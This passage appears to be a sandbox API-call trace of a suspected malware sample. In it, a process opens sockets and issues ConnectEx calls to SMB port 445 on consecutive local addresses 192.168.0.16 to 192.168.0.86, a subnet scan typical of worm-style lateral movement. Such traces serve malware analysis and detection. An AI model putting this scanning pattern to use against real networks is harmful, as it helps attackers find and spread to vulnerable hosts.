lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.187] WSAGetLastError () returned 997 [0137.187] htons (hostshort=0x1bd) returned 0xbd01 [0137.187] ConnectEx (in: s=0x304, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.16"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed5270 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.187] WSAGetLastError () returned 997 [0137.187] htons (hostshort=0x1bd) returned 0xbd01 [0137.187] ConnectEx (in: s=0x308, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.17"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed52a0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.187] WSAGetLastError () returned 997 [0137.187] htons (hostshort=0x1bd) returned 0xbd01 [0137.187] ConnectEx (in: s=0x30c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.18"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed52d0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.188] WSAGetLastError () returned 997 [0137.188] htons (hostshort=0x1bd) returned 0xbd01 [0137.188] ConnectEx (in: s=0x310, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.19"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed5300 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.188] WSAGetLastError () returned 997 [0137.188] htons (hostshort=0x1bd) returned 0xbd01 [0137.188] ConnectEx (in: s=0x314, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.20"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed5330 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.188] WSAGetLastError () returned 997 [0137.188] htons (hostshort=0x1bd) returned 0xbd01 [0137.188] ConnectEx (in: s=0x318, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.21"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed5360 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.189] WSAGetLastError () returned 997 [0137.189] htons (hostshort=0x1bd) returned 0xbd01 [0137.189] ConnectEx (in: s=0x31c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.22"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed5390 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.189] WSAGetLastError () returned 997 [0137.189] htons (hostshort=0x1bd) returned 0xbd01 [0137.189] ConnectEx (in: s=0x320, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.23"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed53c0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.189] WSAGetLastError () returned 997 [0137.189] htons (hostshort=0x1bd) returned 0xbd01 [0137.189] ConnectEx (in: s=0x324, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.24"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed53f0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.190] WSAGetLastError () returned 997 [0137.190] htons (hostshort=0x1bd) returned 0xbd01 [0137.190] ConnectEx (in: s=0x328, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.25"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed5420 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.190] WSAGetLastError () returned 997 [0137.190] htons (hostshort=0x1bd) returned 0xbd01 [0137.190] ConnectEx (in: s=0x32c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.26"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed5450 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.190] WSAGetLastError () returned 997 [0137.190] htons (hostshort=0x1bd) returned 0xbd01 [0137.190] ConnectEx (in: s=0x330, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.27"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed5480 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.191] WSAGetLastError () returned 997 [0137.191] htons (hostshort=0x1bd) returned 0xbd01 [0137.191] ConnectEx (in: s=0x334, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.28"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed54b0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.191] WSAGetLastError () returned 997 [0137.191] htons (hostshort=0x1bd) returned 0xbd01 [0137.191] ConnectEx (in: s=0x338, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.29"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed54e0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.191] WSAGetLastError () returned 997 [0137.191] htons (hostshort=0x1bd) returned 0xbd01 [0137.191] ConnectEx (in: s=0x33c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.30"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed5510 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.192] WSAGetLastError () returned 997 [0137.192] htons (hostshort=0x1bd) returned 0xbd01 [0137.192] ConnectEx (in: s=0x340, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.31"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed5540 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.192] WSAGetLastError () returned 997 [0137.192] htons (hostshort=0x1bd) returned 0xbd01 [0137.192] ConnectEx (in: s=0x344, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.32"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed5570 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.192] WSAGetLastError () returned 997 [0137.192] htons (hostshort=0x1bd) returned 0xbd01 [0137.192] ConnectEx (in: s=0x348, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.33"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed55a0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.193] WSAGetLastError () returned 997 [0137.193] htons (hostshort=0x1bd) returned 0xbd01 [0137.193] ConnectEx (in: s=0x34c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.34"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed55d0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.193] WSAGetLastError () returned 997 [0137.193] htons (hostshort=0x1bd) returned 0xbd01 [0137.193] ConnectEx (in: s=0x350, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.35"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed5600 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.193] WSAGetLastError () returned 997 [0137.193] htons (hostshort=0x1bd) returned 0xbd01 [0137.193] ConnectEx (in: s=0x354, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.36"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed5630 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.194] WSAGetLastError () returned 997 [0137.194] htons (hostshort=0x1bd) returned 0xbd01 [0137.194] ConnectEx (in: s=0x358, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.37"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed5660 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.194] WSAGetLastError () returned 997 [0137.194] htons (hostshort=0x1bd) returned 0xbd01 [0137.194] ConnectEx (in: s=0x35c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.38"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed5690 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.194] WSAGetLastError () returned 997 [0137.194] htons (hostshort=0x1bd) returned 0xbd01 [0137.194] ConnectEx (in: s=0x360, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.39"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xed56c0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.195] WSAGetLastError () returned 997 [0137.195] htons (hostshort=0x1bd) returned 0xbd01 [0137.195] ConnectEx (in: s=0x364, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.40"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee1408 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.195] WSAGetLastError () returned 997 [0137.195] htons (hostshort=0x1bd) returned 0xbd01 [0137.195] ConnectEx (in: s=0x368, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.41"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee1438 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.195] WSAGetLastError () returned 997 [0137.195] htons (hostshort=0x1bd) returned 0xbd01 [0137.195] ConnectEx (in: s=0x36c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.42"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee1468 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.196] WSAGetLastError () returned 997 [0137.196] htons (hostshort=0x1bd) returned 0xbd01 [0137.196] ConnectEx (in: s=0x370, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.43"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee1498 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.196] WSAGetLastError () returned 997 [0137.196] htons (hostshort=0x1bd) returned 0xbd01 [0137.196] ConnectEx (in: s=0x374, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.44"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee14c8 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.196] WSAGetLastError () returned 997 [0137.196] htons (hostshort=0x1bd) returned 0xbd01 [0137.196] ConnectEx (in: s=0x378, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.45"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee14f8 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.196] WSAGetLastError () returned 997 [0137.196] htons (hostshort=0x1bd) returned 0xbd01 [0137.197] ConnectEx (in: s=0x37c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.46"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee1528 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.197] WSAGetLastError () returned 997 [0137.197] htons (hostshort=0x1bd) returned 0xbd01 [0137.197] ConnectEx (in: s=0x380, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.47"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee1558 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.197] WSAGetLastError () returned 997 [0137.197] htons (hostshort=0x1bd) returned 0xbd01 [0137.197] ConnectEx (in: s=0x384, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.48"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee1588 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.197] WSAGetLastError () returned 997 [0137.197] htons (hostshort=0x1bd) returned 0xbd01 [0137.197] ConnectEx (in: s=0x388, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.49"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee15b8 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.198] WSAGetLastError () returned 997 [0137.198] htons (hostshort=0x1bd) returned 0xbd01 [0137.198] ConnectEx (in: s=0x38c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.50"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee15e8 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.198] WSAGetLastError () returned 997 [0137.198] htons (hostshort=0x1bd) returned 0xbd01 [0137.198] ConnectEx (in: s=0x390, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.51"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee1618 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.198] WSAGetLastError () returned 997 [0137.198] htons (hostshort=0x1bd) returned 0xbd01 [0137.198] ConnectEx (in: s=0x394, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.52"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee1648 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.199] WSAGetLastError () returned 997 [0137.199] htons (hostshort=0x1bd) returned 0xbd01 [0137.199] ConnectEx (in: s=0x398, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.53"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee1678 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.199] WSAGetLastError () returned 997 [0137.199] htons (hostshort=0x1bd) returned 0xbd01 [0137.199] ConnectEx (in: s=0x39c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.54"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee16a8 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.199] WSAGetLastError () returned 997 [0137.199] htons (hostshort=0x1bd) returned 0xbd01 [0137.199] ConnectEx (in: s=0x3a0, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.55"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee16d8 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.200] WSAGetLastError () returned 997 [0137.200] htons (hostshort=0x1bd) returned 0xbd01 [0137.200] ConnectEx (in: s=0x3a4, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.56"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee1708 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.200] WSAGetLastError () returned 997 [0137.200] htons (hostshort=0x1bd) returned 0xbd01 [0137.200] ConnectEx (in: s=0x3a8, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.57"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee1738 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.200] WSAGetLastError () returned 997 [0137.200] htons (hostshort=0x1bd) returned 0xbd01 [0137.200] ConnectEx (in: s=0x3ac, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.58"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee1768 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.201] WSAGetLastError () returned 997 [0137.201] htons (hostshort=0x1bd) returned 0xbd01 [0137.201] ConnectEx (in: s=0x3b0, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.59"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee1798 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.201] WSAGetLastError () returned 997 [0137.201] htons (hostshort=0x1bd) returned 0xbd01 [0137.201] ConnectEx (in: s=0x3b4, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.60"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee17c8 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.201] WSAGetLastError () returned 997 [0137.201] htons (hostshort=0x1bd) returned 0xbd01 [0137.201] ConnectEx (in: s=0x3b8, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.61"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee17f8 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.201] WSAGetLastError () returned 997 [0137.201] htons (hostshort=0x1bd) returned 0xbd01 [0137.201] ConnectEx (in: s=0x3bc, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.62"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee1828 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.202] WSAGetLastError () returned 997 [0137.202] htons (hostshort=0x1bd) returned 0xbd01 [0137.202] ConnectEx (in: s=0x3c0, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.63"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee1858 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.202] WSAGetLastError () returned 997 [0137.202] htons (hostshort=0x1bd) returned 0xbd01 [0137.202] ConnectEx (in: s=0x3c4, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.64"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee1888 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.203] WSAGetLastError () returned 997 [0137.203] htons (hostshort=0x1bd) returned 0xbd01 [0137.203] ConnectEx (in: s=0x3c8, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.65"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee18b8 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.203] WSAGetLastError () returned 997 [0137.203] htons (hostshort=0x1bd) returned 0xbd01 [0137.203] ConnectEx (in: s=0x3cc, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.66"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee18e8 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.203] WSAGetLastError () returned 997 [0137.203] htons (hostshort=0x1bd) returned 0xbd01 [0137.203] ConnectEx (in: s=0x3d0, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.67"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee1918 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.203] WSAGetLastError () returned 997 [0137.203] htons (hostshort=0x1bd) returned 0xbd01 [0137.204] ConnectEx (in: s=0x3d4, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.68"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee1948 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.204] WSAGetLastError () returned 997 [0137.204] htons (hostshort=0x1bd) returned 0xbd01 [0137.204] ConnectEx (in: s=0x3d8, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.69"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee1978 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.204] WSAGetLastError () returned 997 [0137.204] htons (hostshort=0x1bd) returned 0xbd01 [0137.204] ConnectEx (in: s=0x3dc, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.70"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee19a8 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.204] WSAGetLastError () returned 997 [0137.204] htons (hostshort=0x1bd) returned 0xbd01 [0137.204] ConnectEx (in: s=0x3e0, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.71"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee19d8 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.205] WSAGetLastError () returned 997 [0137.205] htons (hostshort=0x1bd) returned 0xbd01 [0137.205] ConnectEx (in: s=0x3e4, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.72"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee1a08 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.205] WSAGetLastError () returned 997 [0137.205] htons (hostshort=0x1bd) returned 0xbd01 [0137.205] ConnectEx (in: s=0x3e8, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.73"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee1a38 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.205] WSAGetLastError () returned 997 [0137.205] htons (hostshort=0x1bd) returned 0xbd01 [0137.205] ConnectEx (in: s=0x3ec, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.74"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee1a68 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.206] WSAGetLastError () returned 997 [0137.206] htons (hostshort=0x1bd) returned 0xbd01 [0137.206] ConnectEx (in: s=0x3f0, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.75"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee1a98 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.206] WSAGetLastError () returned 997 [0137.206] htons (hostshort=0x1bd) returned 0xbd01 [0137.206] ConnectEx (in: s=0x3f4, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.76"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee1ac8 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.206] WSAGetLastError () returned 997 [0137.206] htons (hostshort=0x1bd) returned 0xbd01 [0137.206] ConnectEx (in: s=0x3f8, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.77"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee1af8 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.207] WSAGetLastError () returned 997 [0137.207] htons (hostshort=0x1bd) returned 0xbd01 [0137.207] ConnectEx (in: s=0x3fc, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.78"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee1b28 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.207] WSAGetLastError () returned 997 [0137.207] htons (hostshort=0x1bd) returned 0xbd01 [0137.207] ConnectEx (in: s=0x404, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.79"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee1b58 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.207] WSAGetLastError () returned 997 [0137.207] htons (hostshort=0x1bd) returned 0xbd01 [0137.207] ConnectEx (in: s=0x408, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.80"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee1b88 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.207] WSAGetLastError () returned 997 [0137.208] htons (hostshort=0x1bd) returned 0xbd01 [0137.208] ConnectEx (in: s=0x40c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.81"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee1bb8 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.208] WSAGetLastError () returned 997 [0137.208] htons (hostshort=0x1bd) returned 0xbd01 [0137.208] ConnectEx (in: s=0x410, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.82"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee76a0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.208] WSAGetLastError () returned 997 [0137.208] htons (hostshort=0x1bd) returned 0xbd01 [0137.208] ConnectEx (in: s=0x414, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.83"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee76d0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.208] WSAGetLastError () returned 997 [0137.208] htons (hostshort=0x1bd) returned 0xbd01 [0137.208] ConnectEx (in: s=0x418, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.84"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7700 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.209] WSAGetLastError () returned 997 [0137.209] htons (hostshort=0x1bd) returned 0xbd01 [0137.209] ConnectEx (in: s=0x41c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.85"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7730 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.209] WSAGetLastError () returned 997 [0137.209] htons (hostshort=0x1bd) returned 0xbd01 [0137.209] ConnectEx (in: s=0x420, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.86"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee7760 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.210] WSAGetLastError () returned 997 [0137.210] htons 